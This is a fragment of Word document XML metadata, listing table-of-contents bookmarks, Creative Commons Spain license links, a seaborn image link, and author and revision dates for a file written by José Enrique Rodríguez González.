      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc146638870</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1769532</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>77</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc146638869</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1769532</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>71</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc146638868</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1769532</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>65</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc146638866</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1769532</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>59</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc146638865</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1769532</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>53</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc146638864</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1769532</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>47</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc146638863</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1769532</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>41</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc146638862</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1769532</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>35</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc146638861</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1769532</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>29</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc146638860</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1572924</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>23</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc146638859</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>3014714</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>18</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://creativecommons.org/licenses/by/3.0/es/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4784205</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>15</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://creativecommons.org/licenses/by-sa/3.0/es/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5505096</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>12</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://creativecommons.org/licenses/by-nd/3.0/es/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5505103</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>9</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://creativecommons.org/licenses/by-nc/3.0/es/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>786439</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>6</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://creativecommons.org/licenses/by-nc-sa/3.0/es/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>589850</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>3</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://creativecommons.org/licenses/by-nc-nd/3.0/es/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>589850</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://creativecommons.org/licenses/by-nc-nd/3.0/es/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507368</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>7314</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>1033</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://seaborn.pydata.org/_images/aesthetics_7_0.png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jrodg85</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>José Enrique Rodríguez González</cp:lastModifiedBy>
  <cp:revision>34</cp:revision>
  <cp:lastPrinted>2024-01-10T11:36:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-29T20:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-10T11:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>